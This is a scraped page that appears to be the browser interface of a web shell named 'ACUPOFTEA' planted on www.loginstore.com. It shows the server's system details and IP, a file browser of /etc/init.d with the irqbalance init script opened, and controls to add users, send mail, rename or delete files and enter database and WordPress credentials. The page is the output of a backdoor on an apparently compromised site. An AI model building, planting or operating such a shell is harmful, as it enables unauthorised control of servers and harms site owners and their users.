System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
190.119.170.206
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
etc
/
init.d
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
irqbalance
#!/bin/sh ### BEGIN INIT INFO # Provides: irqbalance # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: daemon to balance interrupts for SMP systems ### END INIT INFO # irqbalance init script # August 2003 # Eric Dorland # Based on spamassassin init script PATH=/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/irqbalance NAME=irqbalance SNAME=irqbalance DESC="SMP IRQ Balancer" PIDFILE="/run/$NAME.pid" PNAME="irqbalance" DOPTIONS="" # Defaults - don't touch, edit /etc/default/ OPTIONS="" test -x $DAEMON || exit 0 . /lib/lsb/init-functions test -f /etc/default/irqbalance && . /etc/default/irqbalance # Beware: irqbalance tries to read and handle environment variables # directly itself, but since start-stop-daemon clears the env # we convert the variables to commandline arguments here... # (Note: in the daemon an option is enabled even if its set to # e.g. the empty string or 0 or whatever. To disable it should not # be exported at all!) # Warning: this will need to be maintained and updated on upgrades # to new upstream release which might introduce new ones! if [ ! -z ${IRQBALANCE_ONESHOT+x} ]; then DOPTIONS="--oneshot" fi if [ ! -z ${IRQBALANCE_ARGS+x} ]; then OPTIONS="$OPTIONS $IRQBALANCE_ARGS" fi case "$1" in start) log_begin_msg "Starting $DESC: $NAME" pid=$( pidofproc -p $PIDFILE $DAEMON ) if [ -n "$pid" ] ; then log_begin_msg ". Already running" log_end_msg 0 exit 0 fi mkdir -p /run/irqbalance start-stop-daemon --start --quiet --oknodo --exec $DAEMON -- --pid=$PIDFILE $OPTIONS $DOPTIONS log_end_msg $? ;; stop) log_begin_msg "Stopping $DESC: $NAME" start-stop-daemon --stop --quiet --oknodo --exec $DAEMON rm -f $PIDFILE log_end_msg $? ;; restart|force-reload) log_begin_msg "Restarting $DESC: $NAME" start-stop-daemon --stop --retry 5 --quiet --oknodo --exec $DAEMON rm -f $PIDFILE mkdir -p /run/irqbalance start-stop-daemon --start --quiet --oknodo --exec $DAEMON -- --pid=$PIDFILE $OPTIONS $DOPTIONS log_end_msg $? ;; status) if [ -z "${IRQBALANCE_ONESHOT+x}" ]; then status_of_proc $DAEMON $NAME else echo "Irqbalance setup to run in oneshot mode." fi ;; *) N=/etc/init.d/$SNAME echo "Usage: $N {start|stop|restart|force-reload}" >&2 exit 1 ;; esac exit 0
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-13 04:58:15
..
DIR
-
drwxr-xr-x
2026-08-05 06:57:20
apache-htcacheclean
text/x-shellscript
2.43 KB
-rwxr-xr-x
2023-12-04 06:58:09
apache2
text/x-shellscript
7.99 KB
-rwxr-xr-x
2023-12-04 06:58:10
apparmor
text/x-shellscript
3.65 KB
-rwxr-xr-x
2022-02-23 09:48:59
apport
text/x-shellscript
2.85 KB
-rwxr-xr-x
2025-05-22 08:40:36
console-setup.sh
text/x-shellscript
1.2 KB
-rwxr-xr-x
2021-11-22 04:39:53
cron
text/x-shellscript
2.99 KB
-rwxr-xr-x
2021-03-17 11:14:10
cryptdisks
text/x-shellscript
937 B
-rwxr-xr-x
2022-01-13 09:44:35
cryptdisks-early
text/x-shellscript
896 B
-rwxr-xr-x
2022-01-13 09:44:35
dbus
text/x-shellscript
3.08 KB
-rwxr-xr-x
2021-06-28 12:15:25
grub-common
text/x-shellscript
985 B
-rwxr-xr-x
2022-12-02 03:18:47
hwclock.sh
text/x-shellscript
1.71 KB
-rwxr-xr-x
2022-02-20 11:13:24
irqbalance
text/x-shellscript
2.58 KB
-rwxr-xr-x
2021-10-30 10:55:55
iscsid
text/x-shellscript
1.47 KB
-rwxr-xr-x
2022-01-19 11:38:12
keyboard-setup.sh
text/x-shellscript
1.44 KB
-rwxr-xr-x
2021-07-24 03:45:19
kmod
text/x-shellscript
2 KB
-rwxr-xr-x
2021-01-08 10:42:02
lvm2
text/x-shellscript
695 B
-rwxr-xr-x
2021-05-19 10:19:25
lvm2-lvmpolld
text/x-shellscript
586 B
-rwxr-xr-x
2021-05-19 10:19:25
mysql
text/x-shellscript
5.48 KB
-rwxr-xr-x
2023-06-14 07:23:16
open-iscsi
text/x-shellscript
2.38 KB
-rwxr-xr-x
2022-01-19 11:38:12
open-vm-tools
text/x-shellscript
1.8 KB
-rwxr-xr-x
2023-11-30 12:10:47
plymouth
text/x-shellscript
1.35 KB
-rwxr-xr-x
2022-02-23 02:15:41
plymouth-log
text/x-shellscript
760 B
-rwxr-xr-x
2022-02-23 02:19:47
procps
text/x-shellscript
959 B
-rwxr-xr-x
2022-02-25 11:32:20
proftpd
text/x-shellscript
5.2 KB
-rwxr-xr-x
2021-09-18 09:52:24
rsync
text/x-shellscript
4.31 KB
-rwxr-xr-x
2022-10-11 10:37:36
screen-cleanup
text/x-shellscript
1.19 KB
-rwxr-xr-x
2021-02-18 08:51:15
ssh
text/x-shellscript
3.96 KB
-rwxr-xr-x
2023-01-11 11:09:13
udev
text/x-shellscript
6.71 KB
-rwxr-xr-x
2023-11-21 08:35:56
ufw
text/x-shellscript
2.03 KB
-rwxr-xr-x
2021-09-19 05:07:33
unattended-upgrades
text/x-shellscript
1.36 KB
-rwxr-xr-x
2021-02-19 12:11:42
uuidd
text/x-shellscript
1.28 KB
-rwxr-xr-x
2022-02-21 01:49:57
vsftpd
text/x-shellscript
2.02 KB
-rwxr-xr-x
2024-07-11 12:59:43
x11-common
text/x-shellscript
2.7 KB
-rwxr-xr-x
2021-10-19 09:04:11
~ ACUPOFTEA - www.loginstore.com